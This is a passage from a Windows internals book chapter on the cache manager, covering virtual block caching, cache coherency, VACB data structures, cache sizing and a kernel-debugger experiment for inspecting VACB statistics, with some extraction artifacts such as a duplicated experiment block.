management database stores a partition’s starting sector, size, and other characteristics and
is located on the same disk as the partition.
I
Volumes are objects that represent sectors that file system drivers always manage as a single
unit. Simple volumes represent sectors from a single partition, whereas multipartition volumes
566
CHAPTER 11 Caching and file systems
represent sectors from multiple partitions. Multipartition volumes offer performance, reliability,
and sizing features that simple volumes do not.
I
File system formats define the way that file data is stored on storage media, and they affect a
file system’s features. For example, a format that doesn’t allow user permissions to be associ-
ated with files and directories can’t support security. A file system format also can impose limits
on the sizes of files and storage devices that the file system supports. Finally, some file system
formats efficiently implement support for either large or small files or for large or small disks.
NTFS, exFAT, and ReFS are examples of file system formats that offer different sets of features
and usage scenarios.
I
Clusters are the addressable blocks that many file system formats use. Cluster size is always a
multiple of the sector size, as shown in Figure 11-1, in which eight sectors make up each cluster,
which are represented by a yellow band. File system formats use clusters to manage disk space
more efficiently; a cluster size that is larger than the sector size divides a disk into more man-
ageable blocks. The potential trade-off of a larger cluster size is wasted disk space, or internal
fragmentation, that results when file sizes aren’t exact multiples of the cluster size.
Sector
Cluster (8 sectors)
FIGURE 11-1 Sectors and clusters on a classical spinning disk.
I
Metadata is data stored on a volume in support of file system format management. It isn’t typi-
cally made accessible to applications. Metadata includes the data that defines the placement of
files and directories on a volume, for example.
Key features of the cache manager
The cache manager has several key features:
I
Supports all file system types (both local and network), thus removing the need for each file
system to implement its own cache management code.
I
Uses the memory manager to control which parts of which files are in physical memory (trading
off demands for physical memory between user processes and the operating system).
I
Caches data on a virtual block basis (offsets within a file)—in contrast to many caching systems,
which cache on a logical block basis (offsets within a disk volume)—allowing for intelligent
CHAPTER 11 Caching and file systems
567
read-ahead and high-speed access to the cache without involving file system drivers. (This
method of caching, called fast I/O, is described later in this chapter.)
I
Supports “hints” passed by applications at file open time (such as random versus sequential
access, temporary file creation, and so on).
I
Supports recoverable file systems (for example, those that use transaction logging) to recover
data after a system failure.
I
Supports solid state, NVMe, and direct access (DAX) disks.
Although we talk more throughout this chapter about how these features are used in the cache
manager, in this section we introduce you to the concepts behind these features.
Single, centralized system cache
Some operating systems rely on each individual file system to cache data, a practice that results either in
duplicated caching and memory management code in the operating system or in limitations on the kinds
of data that can be cached. In contrast, Windows offers a centralized caching facility that caches all exter-
nally stored data, whether on local hard disks, USB removable drives, network file servers, or DVD-ROMs.
Any data can be cached, whether it’s user data streams (the contents of a file and the ongoing read and
write activity to that file) or file system metadata (such as directory and file headers). As we discuss in this
chapter, the method Windows uses to access the cache depends on the type of data being cached.
The memory manager
One unusual aspect of the cache manager is that it never knows how much cached data is actually in
physical memory. This statement might sound strange because the purpose of a cache is to keep a sub-
set of frequently accessed data in physical memory as a way to improve I/O performance. The reason
the cache manager doesn’t know how much data is in physical memory is that it accesses data by map-
ping views of files into system virtual address spaces, using standard section objects (or file mapping ob-
jects in Windows API terminology). (Section objects are a basic primitive of the memory manager and
are explained in detail in Chapter 5, “Memory Management” of Part 1). As addresses in these mapped
views are accessed, the memory manager pages-in blocks that aren’t in physical memory. And when
memory demands dictate, the memory manager unmaps these pages out of the cache and, if the data
has changed, pages the data back to the files.
By caching on the basis of a virtual address space using mapped files, the cache manager avoids gen-
erating read or write I/O request packets (IRPs) to access the data for files it’s caching. Instead, it simply
copies data to or from the virtual addresses where the portion of the cached file is mapped and relies on
the memory manager to fault in (or out) the data in to (or out of) memory as needed. This process allows
the memory manager to make global trade-offs on how much RAM to give to the system cache versus
how much to give to user processes. (The cache manager also initiates I/O, such as lazy writing, which we
describe later in this chapter; however, it calls the memory manager to write the pages.) Also, as we dis-
cuss in the next section, this design makes it possible for processes that open cached files to see the same
data as do other processes that are mapping the same files into their user address spaces.
568
CHAPTER 11 Caching and file systems
Cache coherency
One important function of a cache manager is to ensure that any process that accesses cached data will
get the most recent version of that data. A problem can arise when one process opens a file (and hence
the file is cached) while another process maps the file into its address space directly (using the Windows
MapViewOfFile function). This potential problem doesn’t occur under Windows because both the cache
manager and the user applications that map files into their address spaces use the same memory man-
agement file mapping services. Because the memory manager guarantees that it has only one represen-
tation of each unique mapped file (regardless of the number of section objects or mapped views), it maps
all views of a file (even if they overlap) to a single set of pages in physical memory, as shown in Figure 11-2.
(For more information on how the memory manager works with mapped files, see Chapter 5 of Part 1.)
System address
space
View 2
File
View 1
User address
space
System address
space
View 2
User address
space
Control area
Process 1
virtual memory
Physical
memory
Process 2
virtual memory
4 GB
System
cache
2 GB
Mapped file
0
4 GB
System
cache
2 GB
0
Size
0
FIGURE 11-2 Coherent caching scheme.
So, for example, if Process 1 has a view (View 1) of the file mapped into its user address space, and
Process 2 is accessing the same view via the system cache, Process 2 sees any changes that Process
1 makes as they’re made, not as they’re flushed. The memory manager won’t flush all user-mapped
CHAPTER 11 Caching and file systems
569
pages—only those that it knows have been written to (because they have the modified bit set).
Therefore, any process accessing a file under Windows always sees the most up-to-date version of that
file, even if some processes have the file open through the I/O system and others have the file mapped
into their address space using the Windows file mapping functions.
Note Cache coherency in this case refers to coherency between user-mapped data and
cached I/O and not between noncached and cached hardware access and I/Os, which are
almost guaranteed to be incoherent. Also, cache coherency is somewhat more difficult for
network redirectors than for local file systems because network redirectors must imple-
ment additional flushing and purge operations to ensure cache coherency when accessing
network data.
Virtual block caching
The Windows cache manager uses a method known as virtual block caching, in which the cache manager
keeps track of which parts of which files are in the cache. The cache manager is able to monitor these
file portions by mapping 256 KB views of files into system virtual address spaces, using special system
cache routines located in the memory manager. This approach has the following key benefits:
I
It opens up the possibility of doing intelligent read-ahead; because the cache tracks which parts
of which files are in the cache, it can predict where the caller might be going next.
I
It allows the I/O system to bypass going to the file system for requests for data that is already
in the cache (fast I/O). Because the cache manager knows which parts of which files are in the
cache, it can return the address of cached data to satisfy an I/O request without having to call
the file system.
Details of how intelligent read-ahead and fast I/O work are provided later in this chapter in the
“Fast I/O” and “Read-ahead and write-behind” sections.
Stream-based caching
The cache manager is also designed to do stream caching rather than file caching. A stream is a
sequence of bytes within a file. Some file systems, such as NTFS, allow a file to contain more than one
stream; the cache manager accommodates such file systems by caching each stream independently.
NTFS can exploit this feature by organizing its master file table (described later in this chapter in the
“Master file table” section) into streams and by caching these streams as well. In fact, although the
cache manager might be said to cache files, it actually caches streams (all files have at least one stream
of data) identified by both a file name and, if more than one stream exists in the file, a stream name.
Note Internally, the cache manager is not aware of file or stream names but uses pointers to
these structures.
570
CHAPTER 11 Caching and file systems
Recoverable file system support
Recoverable file systems such as NTFS are designed to reconstruct the disk volume structure after a
system failure. This capability means that I/O operations in progress at the time of a system failure must
be either entirely completed or entirely backed out from the disk when the system is restarted. Half-
completed I/O operations can corrupt a disk volume and even render an entire volume inaccessible.
To avoid this problem, a recoverable file system maintains a log file in which it records every update
it intends to make to the file system structure (the file system’s metadata) before it writes the change
to the volume. If the system fails, interrupting volume modifications in progress, the recoverable file
system uses information stored in the log to reissue the volume updates.
To guarantee a successful volume recovery, every log file record documenting a volume update must
be completely written to disk before the update itself is applied to the volume. Because disk writes are
cached, the cache manager and the file system must coordinate metadata updates by ensuring that the
log file is flushed ahead of metadata updates. Overall, the following actions occur in sequence:
1.
The file system writes a log file record documenting the metadata update it intends to make.
2.
The file system calls the cache manager to flush the log file record to disk.
3.
The file system writes the volume update to the cache—that is, it modifies its cached metadata.
4.
The cache manager flushes the altered metadata to disk, updating the volume struc-
ture. (Actually, log file records are batched before being flushed to disk, as are volume
modifications.)
Note The term metadata applies only to changes in the file system structure: file and direc-
tory creation, renaming, and deletion.
When a file system writes data to the cache, it can supply a logical sequence number (LSN) that
identifies the record in its log file, which corresponds to the cache update. The cache manager keeps
track of these numbers, recording the lowest and highest LSNs (representing the oldest and newest
log file records) associated with each page in the cache. In addition, data streams that are protected by
transaction log records are marked as “no write” by NTFS so that the mapped page writer won’t inad-
vertently write out these pages before the corresponding log records are written. (When the mapped
page writer sees a page marked this way, it moves the page to a special list that the cache manager
then flushes at the appropriate time, such as when lazy writer activity takes place.)
When it prepares to flush a group of dirty pages to disk, the cache manager determines the highest
LSN associated with the pages to be flushed and reports that number to the file system. The file system
can then call the cache manager back, directing it to flush log file data up to the point represented by
the reported LSN. After the cache manager flushes the log file up to that LSN, it flushes the correspond-
ing volume structure updates to disk, thus ensuring that it records what it’s going to do before actually
doing it. These interactions between the file system and the cache manager guarantee the recoverabil-
ity of the disk volume after a system failure.
CHAPTER 11 Caching and file systems
571
NTFS MFT working set enhancements
As we have described in the previous paragraphs, the mechanism that the cache manager uses to
cache files is the same as general memory mapped I/O interfaces provided by the memory manager
to the operating system. For accessing or caching a file, the cache manager maps a view of the file in
the system virtual address space. The contents are then accessed simply by reading off the mapped
virtual address range. When the cached content of a file is no longer needed (for various reasons—see
the next paragraphs for details), the cache manager unmaps the view of the file. This strategy works
well for any kind of data files but has some problems with the metadata that the file system maintains
for correctly storing the files in the volume.
When a file handle is closed (or the owning process dies), the cache manager ensures that the cached
data is no longer in the working set. The NTFS file system accesses the Master File Table (MFT) as a big file,
which is cached like any other user files by the cache manager. The problem with the MFT is that, since
it is a system file, which is mapped and processed in the System process context, nobody will ever close
its handle (unless the volume is unmounted), so the system never unmaps any cached view of the MFT.
The process that initially caused a particular view of MFT to be mapped might have closed the handle or
exited, leaving potentially unwanted views of MFT still mapped into memory consuming valuable system
cache (these views will be unmapped only if the system runs into memory pressure).
Windows 8.1 resolved this problem by storing a reference counter to every MFT record in a dynami-
cally allocated multilevel array, which is stored in the NTFS file system Volume Control Block (VCB)
structure. Every time a File Control Block (FCB) data structure is created (further details on the FCB
and VCB are available later in this chapter), the file system increases the counter of the relative MFT
index record. In the same way, when the FCB is destroyed (meaning that all the handles to the file or
directory that the MFT entry refers to are closed), NTFS dereferences the relative counter and calls the
CcUnmapFileOffsetFromSystemCache cache manager routine, which will unmap the part of the MFT
that is no longer needed.
Memory partitions support
Windows 10, with the goal to provide support for Hyper-V containers containers and game mode,
introduced the concept of partitions. Memory partitions have already been described in Chapter
5 of Part 1. As seen in that chapter, memory partitions are represented by a large data structure
(MI_PARTITION), which maintains memory-related management structures related to the partition,
such as page lists (standby, modified, zero, free, and so on), commit charge, working set, page trim-
mer, modified page writer, and zero-page thread. The cache manager needs to cooperate with the
memory manager in order to support partitions. During phase 1 of NT kernel initialization, the system
creates and initializes the cache manager partition (for further details about Windows kernel initial-
ization, see Chapter 12, “Startup and shutdown”), which will be part of the System Executive parti-
tion (MemoryPartition0). The cache manager’s code has gone through a big refactoring to support
partitions; all the global cache manager data structures and variables have been moved in the cache
manager partition data structure (CC_PARTITION).
572
CHAPTER 11 Caching and file systems
The cache manager’s partition contains cache-related data, like the global shared cache maps list,
the worker threads list (read-ahead, write-behind, and extra write-behind; lazy writer and lazy writer
scan; async reads), lazy writer scan events, an array that holds the history of write-behind throughout,
the upper and lower limit for the dirty pages threshold, the number of dirty pages, and so on. When
the cache manager system partition is initialized, all the needed system threads are started in the
context of a System process which belongs to the partition. Each partition always has an associated
minimal System process, which is created at partition-creation time (by the NtCreatePartition API).
When the system creates a new partition through the NtCreatePartition API, it always creates and
initializes an empty MI_PARTITION object (the memory is moved from a parent partition to the child,
or hot-added later by using the NtManagePartition function). A cache manager partition object is
created only on-demand. If no files are created in the context of the new partition, there is no need to
create the cache manager partition object. When the file system creates or opens a file for caching ac-
cess, the CcinitializeCacheMap(Ex) function checks which partition the file belongs to and whether the
partition has a valid link to a cache manager partition. In case there is no cache manager partition, the
system creates and initializes a new one through the CcCreatePartition routine. The new partition starts
separate cache manager-related threads (read-ahead, lazy writers, and so on) and calculates the new
values of the dirty page threshold based on the number of pages that belong to the specific partition.
The file object contains a link to the partition it belongs to through its control area, which is initially
allocated by the file system driver when creating and mapping the Stream Control Block (SCB). The
partition of the target file is stored into a file object extension (of type MemoryPartitionInformation)
and is checked by the memory manager when creating the section object for the SCB. In general, files
are shared entities, so there is no way for File System drivers to automatically associate a file to a differ-
ent partition than the System Partition. An application can set a different partition for a file using the
NtSetInformationFileKernel API, through the new FileMemoryPartitionInformation class.
Cache virtual memory management
Because the Windows system cache manager caches data on a virtual basis, it uses up regions of sys-
tem virtual address space (instead of physical memory) and manages them in structures called virtual
address control blocks, or VACBs. VACBs define these regions of address space into 256 KB slots called
views. When the cache manager initializes during the bootup process, it allocates an initial array of
VACBs to describe cached memory. As caching requirements grow and more memory is required, the
cache manager allocates more VACB arrays, as needed. It can also shrink virtual address space as other
demands put pressure on the system.
At a file’s first I/O (read or write) operation, the cache manager maps a 256 KB view of the 256 KB-
aligned region of the file that contains the requested data into a free slot in the system cache address
space. For example, if 10 bytes starting at an offset of 300,000 bytes were read into a file, the view that
would be mapped would begin at offset 262144 (the second 256 KB-aligned region of the file) and
extend for 256 KB.
CHAPTER 11 Caching and file systems
573
The cache manager maps views of files into slots in the cache’s address space on a round-robin
basis, mapping the first requested view into the first 256 KB slot, the second view into the second 256
KB slot, and so forth, as shown in Figure 11-3. In this example, File B was mapped first, File A second,
and File C third, so File B’s mapped chunk occupies the first slot in the cache. Notice that only the first
256 KB portion of File B has been mapped, which is due to the fact that only part of the file has been
accessed. Because File C is only 100 KB (and thus smaller than one of the views in the system cache), it
requires its own 256 KB slot in the cache.
System cache
View n
View 0
View 1
View 2
View 3
View 4
View 5
View 6
View 7
View 8
Section 0
Section 1
Section 0
Section 1
Section 2
Section 0
File A (500 KB)
File B (750 KB)
File C (100 KB)
FIGURE 11-3 Files of varying sizes mapped into the system cache.
The cache manager guarantees that a view is mapped as long as it’s active (although views can
remain mapped after they become inactive). A view is marked active, however, only during a read
or write operation to or from the file. Unless a process opens a file by specifying the FILE_FLAG_
RANDOM_ ACCESS flag in the call to CreateFile, the cache manager unmaps inactive views of a file as it
maps new views for the file if it detects that the file is being accessed sequentially. Pages for unmapped
views are sent to the standby or modified lists (depending on whether they have been changed), and
because the memory manager exports a special interface for the cache manager, the cache manager
can direct the pages to be placed at the end or front of these lists. Pages that correspond to views of
files opened with the FILE_FLAG_SEQUENTIAL_SCAN flag are moved to the front of the lists, whereas
all others are moved to the end. This scheme encourages the reuse of pages belonging to sequentially
read files and specifically prevents a large file copy operation from affecting more than a small part of
physical memory. The flag also affects unmapping. The cache manager will aggressively unmap views
when this flag is supplied.
If the cache manager needs to map a view of a file, and there are no more free slots in the cache, it will
unmap the least recently mapped inactive view and use that slot. If no views are available, an I/O error is
returned, indicating that insufficient system resources are available to perform the operation. Given that
views are marked active only during a read or write operation, however, this scenario is extremely unlikely
because thousands of files would have to be accessed simultaneously for this situation to occur.
574
CHAPTER 11 Caching and file systems
Cache size
In the following sections, we explain how Windows computes the size of the system cache, both virtu-
ally and physically. As with most calculations related to memory management, the size of the system
cache depends on a number of factors.
Cache virtual size
On a 32-bit Windows system, the virtual size of the system cache is limited solely by the amount of
kernel-mode virtual address space and the SystemCacheLimit registry key that can be optionally con-
figured. (See Chapter 5 of Part 1 for more information on limiting the size of the kernel virtual address
space.) This means that the cache size is capped by the 2-GB system address space, but it is typically
significantly smaller because the system address space is shared with other resources, including system
paged table entries (PTEs), nonpaged and paged pool, and page tables. The maximum virtual cache
size is 64 TB on 64-bit Windows, and even in this case, the limit is still tied to the system address space
size: in future systems that will support the 56-bit addressing mode, the limit will be 32 PB (petabytes).
Cache working set size
As mentioned earlier, one of the key differences in the design of the cache manager in Windows from
that of other operating systems is the delegation of physical memory management to the global
memory manager. Because of this, the existing code that handles working set expansion and trimming,
as well as managing the modified and standby lists, is also used to control the size of the system cache,
dynamically balancing demands for physical memory between processes and the operating system.
The system cache doesn’t have its own working set but shares a single system set that includes
cache data, paged pool, pageable kernel code, and pageable driver code. As explained in the section
“System working sets” in Chapter 5 of Part 1, this single working set is called internally the system cache
working set even though the system cache is just one of the components that contribute to it. For the
purposes of this book, we refer to this working set simply as the system working set. Also explained in
Chapter 5 is the fact that if the LargeSystemCache registry value is 1, the memory manager favors the
system working set over that of processes running on the system.
Cache physical size
While the system working set includes the amount of physical memory that is mapped into views in the
cache’s virtual address space, it does not necessarily reflect the total amount of file data that is cached
in physical memory. There can be a discrepancy between the two values because additional file data
might be in the memory manager’s standby or modified page lists.
Recall from Chapter 5 that during the course of working set trimming or page replacement, the
memory manager can move dirty pages from a working set to either the standby list or the modified
page list, depending on whether the page contains data that needs to be written to the paging file or
another file before the page can be reused. If the memory manager didn’t implement these lists, any
time a process accessed data previously removed from its working set, the memory manager would
CHAPTER 11 Caching and file systems
575
have to hard-fault it in from disk. Instead, if the accessed data is present on either of these lists, the
memory manager simply soft-faults the page back into the process’s working set. Thus, the lists serve
as in-memory caches of data that are stored in the paging file, executable images, or data files. Thus,
the total amount of file data cached on a system includes not only the system working set but the com-
bined sizes of the standby and modified page lists as well.
An example illustrates how the cache manager can cause much more file data than that containable
in the system working set to be cached in physical memory. Consider a system that acts as a dedicated
file server. A client application accesses file data from across the network, while a server, such as the
file server driver (%SystemRoot%\System32\Drivers\Srv2.sys, described later in this chapter), uses
cache manager interfaces to read and write file data on behalf of the client. If the client reads through
several thousand files of 1 MB each, the cache manager will have to start reusing views when it runs out
of mapping space (and can’t enlarge the VACB mapping area). For each file read thereafter, the cache
manager unmaps views and remaps them for new files. When the cache manager unmaps a view, the
memory manager doesn’t discard the file data in the cache’s working set that corresponds to the view;
it moves the data to the standby list. In the absence of any other demand for physical memory, the
standby list can consume almost all the physical memory that remains outside the system working set.
In other words, virtually all the server’s physical memory will be used to cache file data, as shown in
Figure 11-4.
Standby list
System working set
assigned to
virtual cache
Other
~7 GB
960 MB
8 GB physical memory
FIGURE 11-4 Example in which most of physical memory is being used by the file cache.
Because the total amount of file data cached includes the system working set, modified page list,
and standby list—the sizes of which are all controlled by the memory manager—it is in a sense the real
cache manager. The cache manager subsystem simply provides convenient interfaces for accessing
file data through the memory manager. It also plays an important role with its read-ahead and write-
behind policies in influencing what data the memory manager keeps present in physical memory, as
well as with managing system virtual address views of the space.
To try to accurately reflect the total amount of file data that’s cached on a system, Task Manager
shows a value named “Cached” in its performance view that reflects the combined size of the sys-
tem working set, standby list, and modified page list. Process Explorer, on the other hand, breaks up
these values into Cache WS (system cache working set), Standby, and Modified. Figure 11-5 shows the
system information view in Process Explorer and the Cache WS value in the Physical Memory area in
the lower left of the figure, as well as the size of the standby and modified lists in the Paging Lists area
near the middle of the figure. Note that the Cache value in Task Manager also includes the Paged WS,
576
CHAPTER 11 Caching and file systems
Kernel WS, and Driver WS values shown in Process Explorer. When these values were chosen, the vast
majority of System WS came from the Cache WS. This is no longer the case today, but the anachronism
remains in Task Manager.
FIGURE 11-5 Process Explorer’s System Information dialog box.
Cache data structures
The cache manager uses the following data structures to keep track of cached files:
I
Each 256 KB slot in the system cache is described by a VACB.
I
Each separately opened cached file has a private cache map, which contains information used
to control read-ahead (discussed later in the chapter in the “Intelligent read-ahead” section).
I
Each cached file has a single shared cache map structure, which points to slots in the system
cache that contain mapped views of the file.
These structures and their relationships are described in the next sections.
Systemwide cache data structures
As previously described, the cache manager keeps track of the state of the views in the system cache
by using an array of data structures called virtual address control block (VACB) arrays that are stored in
nonpaged pool. On a 32-bit system, each VACB is 32 bytes in size and a VACB array is 128 KB, resulting
CHAPTER 11 Caching and file systems
577
in 4,096 VACBs per array. On a 64-bit system, a VACB is 40 bytes, resulting in 3,276 VACBs per array. The
cache manager allocates the initial VACB array during system initialization and links it into the sys-
temwide list of VACB arrays called CcVacbArrays. Each VACB represents one 256 KB view in the system
cache, as shown in Figure 11-6. The structure of a VACB is shown in Figure 11-7.
VACB array list
VACB n entry
VACB 0 entry
VACB 1 entry
VACB 2 entry
VACB 3 entry
VACB 4 entry
VACB 5 entry
VACB 6 entry
VACB 7 entry
. . .
. . .
. . .
. . .
. . .
. . .
System cache
View n
View 0
View 1
View 2
View 3
View 4
View 5
View 6
View 7
. . .
. . .
. . .
. . .
. . .
. . .
VACB array list
VACB n entry
VACB 0 entry
VACB 1 entry
VACB 2 entry
VACB 3 entry
VACB 4 entry
VACB 5 entry
VACB 6 entry
VACB 7 entry
. . .
. . .
. . .
. . .
. . .
. . .
System cache
View n
View 0
View 1
View 2
View 3
View 4
View 5
View 6
View 7
. . .
. . .
. . .
. . .
. . .
. . .
System VACB array list
VACB 0 array
VACB 1 array
FIGURE 11-6 System VACB array.
Virtual address of data in system cache
Pointer to shared cache map
File offset
Active count
Link entry to LRU list head
Pointer to owning VACB array
FIGURE 11-7 VACB data structure.
578
CHAPTER 11 Caching and file systems
Additionally, each VACB array is composed of two kinds of VACB: low priority mapping VACBs and high
priority mapping VACBs. The system allocates 64 initial high priority VACBs for each VACB array. High
priority VACBs have the distinction of having their views preallocated from system address space. When
the memory manager has no views to give to the cache manager at the time of mapping some data, and
if the mapping request is marked as high priority, the cache manager will use one of the preallocated
views present in a high priority VACB. It uses these high priority VACBs, for example, for critical file system
metadata as well as for purging data from the cache. After high priority VACBs are gone, however, any
operation requiring a VACB view will fail with insufficient resources. Typically, the mapping priority is set
to the default of low, but by using the PIN_HIGH_PRIORITY flag when pinning (described later) cached
data, file systems can request a high priority VACB to be used instead, if one is needed.
As you can see in Figure 11-7, the first field in a VACB is the virtual address of the data in the system
cache. The second field is a pointer to the shared cache map structure, which identifies which file is
cached. The third field identifies the offset within the file at which the view begins (always based on
256 KB granularity). Given this granularity, the bottom 16 bits of the file offset will always be zero, so
those bits are reused to store the number of references to the view—that is, how many active reads
or writes are accessing the view. The fourth field links the VACB into a list of least-recently-used (LRU)
VACBs when the cache manager frees the VACB; the cache manager first checks this list when allocat-
ing a new VACB. Finally, the fifth field links this VACB to the VACB array header representing the array
in which the VACB is stored.
During an I/O operation on a file, the file’s VACB reference count is incremented, and then it’s
decremented when the I/O operation is over. When the reference count is nonzero, the VACB is active.
For access to file system metadata, the active count represents how many file system drivers have the
pages in that view locked into memory.
EXPERIMENT: Looking at VACBs and VACB statistics
The cache manager internally keeps track of various values that are useful to developers and
support engineers when debugging crash dumps. All these debugging variables start with the
CcDbg prefix, which makes it easy to see the whole list, thanks to the x command:
1: kd> x nt!*ccdbg*
fffff800`d052741c nt!CcDbgNumberOfFailedWorkQueueEntryAllocations = <no type information>
fffff800`d05276ec nt!CcDbgNumberOfNoopedReadAheads = <no type information>
fffff800`d05276e8 nt!CcDbgLsnLargerThanHint = <no type information>
fffff800`d05276e4 nt!CcDbgAdditionalPagesQueuedCount = <no type information>
fffff800`d0543370 nt!CcDbgFoundAsyncReadThreadListEmpty = <no type information>
fffff800`d054336c nt!CcDbgNumberOfCcUnmapInactiveViews = <no type information>
fffff800`d05276e0 nt!CcDbgSkippedReductions = <no type information>
fffff800`d0542e04 nt!CcDbgDisableDAX = <no type information>
...
Some systems may show differences in variable names due to 32-bit versus 64-bit imple-
mentations. The exact variable names are irrelevant in this experiment—focus instead on the
methodology that is explained. Using these variables and your knowledge of the VACB array
header data structures, you can use the kernel debugger to list all the VACB array headers.
EXPERIMENT: Looking at VACBs and VACB statistics
The cache manager internally keeps track of various values that are useful to developers and
support engineers when debugging crash dumps. All these debugging variables start with the
CcDbg prefix, which makes it easy to see the whole list, thanks to the x command:
1: kd> x nt!*ccdbg*
fffff800`d052741c nt!CcDbgNumberOfFailedWorkQueueEntryAllocations = <no type information>
fffff800`d05276ec nt!CcDbgNumberOfNoopedReadAheads = <no type information>
fffff800`d05276e8 nt!CcDbgLsnLargerThanHint = <no type information>
fffff800`d05276e4 nt!CcDbgAdditionalPagesQueuedCount = <no type information>
fffff800`d0543370 nt!CcDbgFoundAsyncReadThreadListEmpty = <no type information>
fffff800`d054336c nt!CcDbgNumberOfCcUnmapInactiveViews = <no type information>
fffff800`d05276e0 nt!CcDbgSkippedReductions = <no type information>
fffff800`d0542e04 nt!CcDbgDisableDAX = <no type information>
...
Some systems may show differences in variable names due to 32-bit versus 64-bit imple-
mentations. The exact variable names are irrelevant in this experiment—focus instead on the
methodology that is explained. Using these variables and your knowledge of the VACB array
header data structures, you can use the kernel debugger to list all the VACB array headers.
CHAPTER 11 Caching and file systems
579
The CcVacbArrays variable is an array of pointers to VACB array headers, which you dereference
to dump the contents of the _VACB_ARRAY_HEADERs. First, obtain the highest array index:
1: kd> dd nt!CcVacbArraysHighestUsedIndex l1
fffff800`d0529c1c 00000000
And now you can dereference each index until the maximum index. On this system (and this is
the norm), the highest index is 0, which means there’s only one header to dereference:
1: kd> ?? (*((nt!_VACB_ARRAY_HEADER***)@@(nt!CcVacbArrays)))[0]
struct _VACB_ARRAY_HEADER * 0xffffc40d`221cb000
+0x000 VacbArrayIndex : 0
+0x004 MappingCount : 0x302
+0x008 HighestMappedIndex : 0x301
+0x00c Reserved
: 0
If there were more, you could change the array index at the end of the command with a
higher number, until you reach the highest used index. The output shows that the system has
only one VACB array with 770 (0x302) active VACBs.
Finally, the CcNumberOfFreeVacbs variable stores the number of VACBs on the free VACB list.
Dumping this variable on the system used for the experiment results in 2,506 (0x9ca):
1: kd> dd nt!CcNumberOfFreeVacbs l1
fffff800`d0527318 000009ca
As expected, the sum of the free (0x9ca—2,506 decimal) and active VACBs (0x302—770
decimal) on a 64-bit system with one VACB array equals 3,276, the number of VACBs in one VACB
array. If the system were to run out of free VACBs, the cache manager would try to allocate a new
VACB array. Because of the volatile nature of this experiment, your system may create and/or
free additional VACBs between the two steps (dumping the active and then the free VACBs). This
might cause your total of free and active VACBs to not match exactly 3,276. Try quickly repeating
the experiment a couple of times if this happens, although you may never get stable numbers,
especially if there is lots of file system activity on the system.
Per-file cache data structures
Each open handle to a file has a corresponding file object. (File objects are explained in detail in
Chapter 6 of Part 1, “I/O system.”) If the file is cached, the file object points to a private cache map struc-
ture that contains the location of the last two reads so that the cache manager can perform intelligent
read-ahead (described later, in the section “Intelligent read-ahead”). In addition, all the private cache
maps for open instances of a file are linked together.
Each cached file (as opposed to file object) has a shared cache map structure that describes the state
of the cached file, including the partition to which it belongs, its size, and its valid data length. (The
function of the valid data length field is explained in the section “Write-back caching and lazy writing.”)
The shared cache map also points to the section object (maintained by the memory manager and which
describes the file’s mapping into virtual memory), the list of private cache maps associated with that
The CcVacbArrays variable is an array of pointers to VACB array headers, which you dereference
to dump the contents of the _VACB_ARRAY_HEADERs. First, obtain the highest array index:
1: kd> dd nt!CcVacbArraysHighestUsedIndex l1
fffff800`d0529c1c 00000000
And now you can dereference each index until the maximum index. On this system (and this is
the norm), the highest index is 0, which means there’s only one header to dereference:
1: kd> ?? (*((nt!_VACB_ARRAY_HEADER***)@@(nt!CcVacbArrays)))[0]
struct _VACB_ARRAY_HEADER * 0xffffc40d`221cb000
+0x000 VacbArrayIndex : 0
+0x004 MappingCount : 0x302
+0x008 HighestMappedIndex : 0x301
+0x00c Reserved
: 0
If there were more, you could change the array index at the end of the command with a
higher number, until you reach the highest used index. The output shows that the system has
only one VACB array with 770 (0x302) active VACBs.
Finally, the CcNumberOfFreeVacbs variable stores the number of VACBs on the free VACB list.
Dumping this variable on the system used for the experiment results in 2,506 (0x9ca):
1: kd> dd nt!CcNumberOfFreeVacbs l1
fffff800`d0527318 000009ca
As expected, the sum of the free (0x9ca—2,506 decimal) and active VACBs (0x302—770
decimal) on a 64-bit system with one VACB array equals 3,276, the number of VACBs in one VACB
array. If the system were to run out of free VACBs, the cache manager would try to allocate a new
VACB array. Because of the volatile nature of this experiment, your system may create and/or
free additional VACBs between the two steps (dumping the active and then the free VACBs). This
might cause your total of free and active VACBs to not match exactly 3,276. Try quickly repeating
the experiment a couple of times if this happens, although you may never get stable numbers,
especially if there is lots of file system activity on the system.
580
CHAPTER 11 Caching and file systems
file, and any VACBs that describe currently mapped views of the file in the system cache. (See Chapter
5 of Part 1 for more about section object pointers.) All the opened shared cache maps for different files
are linked in a global linked list maintained in the cache manager’s partition data structure. The rela-
tionships among these per-file cache data structures are illustrated in Figure 11-8.
Shared cache map
Entry 3
List of private
cache maps
Open count
File size
Valid data length
Entry 0
Entry 1
Entry 2
Section object pointers
File object
File object
Private cache map
Read-ahead information
Pointer to
additional VACB
index array
Next private
cache map
for this file
Next shared
cache map
VACB
VACB index
array
VACB index array
FIGURE 11-8 Per-file cache data structures.
When asked to read from a particular file, the cache manager must determine the answers to
two questions:
1.
Is the file in the cache?
2.
If so, which VACB, if any, refers to the requested location?
In other words, the cache manager must find out whether a view of the file at the desired address is
mapped into the system cache. If no VACB contains the desired file offset, the requested data isn’t cur-
rently mapped into the system cache.
To keep track of which views for a given file are mapped into the system cache, the cache manager
maintains an array of pointers to VACBs, which is known as the VACB index array. The first entry in the
VACB index array refers to the first 256 KB of the file, the second entry to the second 256 KB, and so
on. The diagram in Figure 11-9 shows four different sections from three different files that are currently
mapped into the system cache.
CHAPTER 11 Caching and file systems
581
When a process accesses a particular file in a given location, the cache manager looks in the appro-
priate entry in the file’s VACB index array to see whether the requested data has been mapped into the
cache. If the array entry is nonzero (and hence contains a pointer to a VACB), the area of the file being
referenced is in the cache. The VACB, in turn, points to the location in the system cache where the view
of the file is mapped. If the entry is zero, the cache manager must find a free slot in the system cache
(and therefore a free VACB) to map the required view.
As a size optimization, the shared cache map contains a VACB index array that is four entries in size.
Because each VACB describes 256 KB, the entries in this small, fixed-size index array can point to VACB
array entries that together describe a file of up to 1 MB. If a file is larger than 1 MB, a separate VACB index
array is allocated from nonpaged pool, based on the size of the file divided by 256 KB and rounded up
in the case of a remainder. The shared cache map then points to this separate structure.
System cache
View n
View 0
View 1
View 2
View 3
View 4
View 5
View 6
View 7
View 8
System VACB array
VACB n
VACB 0
VACB 1
VACB 2
VACB 3
VACB 4
VACB 5
VACB 6
VACB 7
Section 0
Section 1
Section 0
Section 1
Section 2
Section 0
File A (500 KB)
File B (750 KB)
File C (100 KB)
Entry 0
Entry 1
File A VACB
Index array
Entry 2
Entry 3
Entry 0
Entry 1
File B VACB
Index array
Entry 2
Entry 3
Entry 0
Entry 1
File C VACB
Index array
